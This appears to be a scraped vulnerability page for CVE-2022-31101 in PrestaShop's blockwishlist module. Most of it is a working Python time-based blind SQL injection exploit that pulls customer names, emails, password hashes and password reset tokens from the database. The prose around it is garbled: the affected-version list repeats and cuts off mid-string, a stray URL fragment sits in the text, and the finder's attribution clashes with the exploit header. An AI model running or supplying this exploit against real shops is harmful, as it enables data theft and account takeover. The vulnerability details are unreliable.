CVE-2022-31101 Blockwishlist adds a block containing customer's wishlists to affected versions of Prestashop, which is fixed in version 2.1.1. Users are advised to upgrade.

Prestashop versions 2.1.0 to 2.1.0.4, 2.0.15 to 2.0.15.4, 2.1.0 to 2.1.0.3, 2.0.14 to 2.0.14.5, 2.1.0 to 2.1.0.2, 2.0.13 to 2.0.13.6, 2.1.0 to 2.1.0.1, 2.0.12 to 2.0.12.7, 2.1.0 to 2.1.0.0, 2.0.11 to 2.0.11.8, 2.1.0 to 2.1.0.0, 2.0.10 to 2.0.10.9, 2.1.0 to 2.1.0.0, 2.0.9 to 2.0.9.10, 2.1.0 to 2.1.0.0, 2.0.8 to 2.0.8.11, 2.1.0 to 2.1.0.0, 2.0.7 to 2.0.7.12, 2.1.0 to 2.1.0.0, 2.0.6 to 2.0.6.13, 2.1.0 to 2.1.0.0, 2.

Backward Incompatibility

Backward incompatibility is an issue that can occur in an upgrade process. For example, if you have version 2.0 of your software and decide to upgrade to version 2.1, you will be unable to use the old features from 2.0 with the new features in 2.1, as they are not compatible with one another.

Vendor Response

Prestashop released a security update to address this vulnerability. The vulnerability was discovered by the team at Core Security, who have published an attack surface analysis of the vulnerability.
The vulnerability affects versions 2.1.0 to 2.1.0.4, 2.0.15 to 2.0.15.4, 2.1.0 to 2.1.0.3, 2x2-2016033020312-1025-sql_injection/CVE-2022-31101/2-3000024e8f6b04c09d90883bfd7c8f7ce"&ticket=EKDVwMzJtYWNoZTUtN2QtZjI3YmFhZjdhMTEtNTkxNWMzOWMxOTg5NDgyMzEwMDU5YTgxZWUyNjA2OGQ%3D%3D

Exploit

# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi
# Date: 29/07/22
# Exploit Author: Karthik UJ (@5up3r541y4n)
# Vendor Homepage: https://www.prestashop.com/en
# Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0
# Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/
# Version (blockwishlist): 2.1.0
# Version (prestashop): 1.7.8.1
# Tested on: Linux
# CVE: CVE-2022-31101


# This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop

import requests

url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1
cookie = input("Enter cookie value:\n")

header = {
    "Cookie": cookie
}

# Define static stuff
param = "&order="
staticStart = "p.name, (select case when ("
staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc"
charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~'
charset = list(charset)
emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.'
emailCharset = list(emailCharset)


# Query current database name length
print("\nFinding db name's length:")
for length in range(1, 65):
    condition = "LENGTH(database())=" + str(length)
    fullUrl = url + param + staticStart + condition + staticEnd

    try:
        req = requests.get(fullUrl, headers=header, timeout=8)
    except requests.exceptions.Timeout:
        dbLength=length
        print("Length: ", length, end='')
        print("\n")
        break

print("Enumerating current database name:")
databaseName = ''
for i in range(1, dbLength+1):
    for char in charset:
        condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')"
        fullUrl = url + param + staticStart + condition + staticEnd

        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            print(char, end='')
            databaseName += char
            break
print()

# Enumerate any table
prefix = "ps_"
tableName = prefix + "customer"
staticStart = "p.name, (select case when ("
staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer="
staticEnd2 = "); -- .asc"

print("\nEnumerating " + tableName + " table")

for id in range(1, 10):

    condition = "id_customer=" + str(id)
    fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

    try:
        req = requests.get(fullUrl, headers=header, timeout=8)
        print("\nOnly " + str(id - 1) + " records found. Exiting...")
        break
    except requests.exceptions.Timeout:
        pass

    print("\nid = " + str(id))

    # Finding firstname length
    for length in range(0, 100):
        condition = "LENGTH(firstname)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            firstnameLength=length
            print("Firstname length: ", length, end='')
            print()
            break
        
    
    # Enumerate firstname
    firstname = ''
    print("Firstname: ", end='')
    for i in range(1, length+1):
        for char in charset:
            condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
            except requests.exceptions.Timeout:
                print(char, end='')
                firstname += char
                break
    print()

    # Finding lastname length
    for length in range(1, 100):
        condition = "LENGTH(lastname)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            lastnameLength=length
            print("Lastname length: ", length, end='')
            print()
            break
    
    # Enumerate lastname
    lastname = ''
    print("Lastname: ", end='')
    for i in range(1, length+1):
        for char in charset:
            condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
            except requests.exceptions.Timeout:
                print(char, end='')
                firstname += char
                break
    print()

    # Finding email length
    for length in range(1, 320):
        condition = "LENGTH(email)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            emailLength=length
            print("Email length: ", length, end='')
            print()
            break    

    # Enumerate email
    email = ''
    print("Email: ", end='')
    for i in range(1, length+1):
        for char in emailCharset:
            condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    email += char
            except requests.exceptions.Timeout:
                print(char, end='')
                email += char
                break
    print()

    # Finding password hash length
    for length in range(1, 500):
        condition = "LENGTH(passwd)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            passwordHashLength=length
            print("Password hash length: ", length, end='')
            print()
            break    

    # Enumerate password hash
    passwordHash = ''
    print("Password hash: ", end='')
    for i in range(1, length+1):
        for char in emailCharset:
            condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    passwordHash += char
            except requests.exceptions.Timeout:
                print(char, end='')
                passwordHash += char
                break
    print()

    # Finding password reset token length
    for length in range(0, 500):
        condition = "LENGTH(reset_password_token)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            passwordResetTokenLength=length
            print("Password reset token length: ", length, end='')
            print()
            break    

    # Enumerate password reset token
    passwordResetToken = ''
    print("Password reset token: ", end='')
    for i in range(1, length+1):
        for char in emailCharset:
            condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    passwordResetToken += char
            except requests.exceptions.Timeout:
                print(char, end='')
                passwordResetToken += char
                break
    print()

Timeline

Published on: 06/27/2022 23:15:00 UTC
Last modified on: 08/10/2022 20:15:00 UTC

References